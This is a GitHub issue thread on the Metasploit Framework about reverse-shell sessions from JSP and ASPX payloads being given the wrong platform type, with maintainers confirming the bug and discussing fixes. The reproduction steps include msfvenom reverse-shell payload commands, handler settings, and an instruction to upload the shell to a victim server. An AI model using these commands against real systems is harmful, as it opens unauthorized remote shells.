rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Using java/jsp_shell_reverse_tcp with exploit/multi/handler results in a Windows shell with the wrong "shell type" #14827

Open ShawnDEvans opened 3 years ago

ShawnDEvans commented 3 years ago

Steps to reproduce

How'd you do it?

Set up the 'sploit handler:

  1. use exploit/multi/handler
  2. set PAYLOAD java/jsp_shell_reverse_tcp
  3. set LHOST my.host
  4. set ExitOnSession false
  5. set SHELL cmd.exe
  6. exploit -j -z

Create the payload: $ msfvenom -p java/jsp_shell_reverse_tcp LHOST=my.host LPORT=4444 -f raw > shell.jsp

Upload the payload to the victim web server, and access the script with 'curl' to execute server side.

Expected behavior

What should happen? I should get a shell, and the shell type should be "shell window"

Current behavior

I get a shell! However, the shell is not designated as the correct shell type. See detailed output below:

```
  Session ID: 21
        Name: 
        Type: shell linux <--- THIS GUY IS WRONG
        Info: Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.
      Tunnel: my.host:4444 -> victim.host:51725 (victim.host.ip)
         Via: exploit/multi/handler
   Encrypted: No
        UUID: 
     CheckIn: 
  Registered: No
```

What happens instead? The shell type should be "shell windows" not "shell linux". The "info" section is a bit of a dead giveaway. The incorrect shell attribute results in an inability to upgrade the generic shell to a Meterpreter session.

Metasploit version

```
msf6 exploit(multi/handler) > version
Framework: 6.0.29-dev
Console  : 6.0.29-dev
```

Additional Information

If your version is less than 5.0.96, please update to the latest version and ensure your issue is still present.

If the issue is encountered within msfconsole, please run the debug command using the instructions below. If the issue is encountered outside msfconsole, or the issue causes msfconsole to crash on startup, please delete this section.

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

```
[framework/ui/console]
ActiveModule=exploit/multi/handler

[multi/handler]
PAYLOAD=java/jsp_shell_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=false
ListenerTimeout=0
LHOST=203.100.10.219
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PLATFORM=
ARCH=
SHELL=cmd.exe
CreateSession=true
InitialAutoRunScript=
AutoRunScript=
CommandShellCleanupCommand=
target=0
loglevel=3
```

History

The following commands were ran during the session and before this issue occurred:

```
518 sessions -u 1
519 show options
520 info
521 set SHELL ''
522 show options
523 sessions -l
524 show options
525 info
526 show options advanced
527 set target 1
528 info
529 show options
530 sessions -i
531 sessions -l
532 sessions -i 1
533 sessions -i
534 jobs
535 search handler
536 show options
537 asdf
538 info
539 sessoins -i
540 sessions -i
541 sessions -h
542 sessions -v
543 history
544 info
545 show options
546 sessions -v
547 version
548 set loglevel 3
549 debug
550 jobs
551 jobs -K
552 show options
553 set SHELL cmd.exe
554 exploit -j -z
555 jobs
556 set TARGET 0
557 exploit -j -z
558 jobs
559 debug
560 essions
561 sessions
563 show options
564 info
565 show options advanced
566 info
567 debug
```

Framework Errors

The following framework errors occurred before the issue occurred:

```
[02/11/2021 20:30:28] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[02/11/2021 20:45:01] [e(0)] core: Exploit failed (multi/handler) - Rex::ArgumentError An invalid argument was specified. Invalid target index.
[02/11/2021 20:46:08] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[02/11/2021 20:46:08] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[02/11/2021 20:46:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[02/11/2021 20:46:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[02/11/2021 20:48:39] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[02/11/2021 20:48:39] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[02/11/2021 20:48:39] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[02/11/2021 20:48:39] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
```

Web Service Errors

The following web service errors occurred before the issue occurred:

```
msf-ws.log does not exist.
```

Framework Logs

The following framework logs were recorded before the issue occurred:


Web Service Logs

The following web service logs were recorded before the issue occurred:

```
msf-ws.log does not exist.
```

Version/Install

The versions and install method of your Metasploit setup:

```
Framework: 6.0.29-dev
Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [aarch64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
```

yzddmr6 commented 3 years ago

I mentioned this problem two years ago, but it hasn't been fixed: #11829

adfoster-r7 commented 3 years ago

Confirmed

Now view the session details:

```
msf6 exploit(multi/handler) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: shell linux <-- Wrong
        Info: Microsoft Windows [Version 10.0.18363.1379] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\a\Downloads\apache-tomcat-10.0.4-windows-x64\apache-tomcat-10.0.4\bin>
      Tunnel: host:4444 -> remote:50477 (remote)
         Via: exploit/multi/handler
   Encrypted: No
        UUID: 
     CheckIn: <none>
  Registered: No
```

Also verified that sessions -u 1 doesn't work:

```
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1

[-] Shells on the target platform, linux, cannot be upgraded to Meterpreter at this time.
```

sempervictus commented 3 years ago

This was discussed briefly @ the last hackathon, but the problem lies in the disambiguation of platform from runtime - we treat Java like we treat Windows, when what we should be doing is "comprehending" JVM on Win vs Ruby on BSD and so on.

timwr commented 3 years ago

Fixing Type: shell linux on sessions -v is a bit fiddly, but just fixing sessions -u so that it detects the platform should be easier

adfoster-r7 commented 3 years ago

Haven't looked into it further, but I believe this might be the same issue as shell_reverse_tcp sessions created via aspx payload, which are incorrectly treated as bsd shells.

Payload:

```
msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.19" LPORT=4444 -f aspx > shell.aspx
```

Session information:

```
msf5 exploit(multi/handler) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: shell bsd
        Info: Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation.  All rights reserved. c:\windows\system32\inetsrv>
      Tunnel: 10.10.14.24:4444 -> 10.10.10.5:49187 (10.10.10.5)
         Via: exploit/multi/handler
   Encrypted: false
        UUID: 
     CheckIn: <none>
  Registered: No
```

Annoyingly it stops me from running shell_to_meterpreter as well:

```
msf5 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[-] Shells on the target platform, bsd, cannot be upgraded to Meterpreter at this time.
```

sempervictus commented 3 years ago

I'll resurrect part of the discussion around the underlying problem here: we need stratification between OS and runtime so that the shell is windows and the platform is java. There are dark days ahead for anyone doing that work because it requires untangling the handler code - something we have looked at but never undertaken as a community.

timwr commented 3 years ago

So we already have AutoVerifySession enabled by default for shells. We could consider a new option, off by default, called AutoVerifySessionType that attempts to confirm ( and update) the session platform. We then have that option on by default for java/jsp_shell_reverse_tcp (and potentially payload/generic/shell_reverse_tcp) payloads?
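As an added illustration of the AutoVerifySessionType idea in the comment above (example code written for this page, not Metasploit's own, with hypothetical method names): it classifies the banner that already lands in the session's Info field and reports whether the platform the payload metadata claimed should be corrected, which is the decision the mislabelled "shell linux" and "shell bsd" sessions in this thread need.

```ruby
# Added example, not Metasploit code: a minimal sketch of what an
# "AutoVerifySessionType"-style check could do, using the banner text the
# handler already stores in the session's Info field. Method names are
# hypothetical.

# Patterns that identify an OS from a shell's first output or prompt.
# Assumption: banners like the two quoted in this issue are what arrives.
BANNER_RULES = [
  # "Microsoft Windows [Version 10.0.14393]" or a trailing "C:\...>" prompt
  [:windows, /Microsoft Windows \[Version [\d.]+\]|^[A-Za-z]:\\.*>\s*\z/m],
  [:linux,   /\bLinux\b|\bGNU\b/],
  [:bsd,     /\bFreeBSD\b|\bOpenBSD\b|\bNetBSD\b/],
  [:osx,     /\bDarwin\b/]
].freeze

# Return the platform symbol inferred from banner text, or nil if unknown.
def platform_from_banner(banner)
  return nil if banner.nil? || banner.strip.empty?
  rule = BANNER_RULES.find { |_, re| banner.match?(re) }
  rule && rule.first
end

# Compare the platform the payload metadata claimed with what the banner
# shows. Returns a hash describing the decision; a caller would update
# the session's platform (and its "shell <platform>" label) on :corrected
# and leave it alone on :unverified, so an empty banner never clobbers it.
def verify_session_type(claimed_platform, banner)
  observed = platform_from_banner(banner)
  if observed.nil?
    { status: :unverified, platform: claimed_platform.to_sym }
  elsif observed == claimed_platform.to_sym
    { status: :confirmed, platform: observed }
  else
    { status: :corrected, platform: observed, was: claimed_platform.to_sym }
  end
end

# The "Type" column in `sessions -v` is the session kind plus platform.
def session_type_label(kind, platform)
  "#{kind} #{platform}"
end

if __FILE__ == $PROGRAM_NAME
  # Constructed banner mirroring the Info line quoted in this issue.
  banner = 'Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft ' \
           'Corporation. All rights reserved.'
  r = verify_session_type(:linux, banner)
  puts "#{r[:status]}: #{session_type_label('shell', r[:platform])}"
end
```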

sempervictus commented 3 years ago

@timwr: you dirty dirty hacker :-p. That said, i can't poke any functional holes in it to be honest - since there's a mess underneath, the Ruby way is to plaster over it up-top.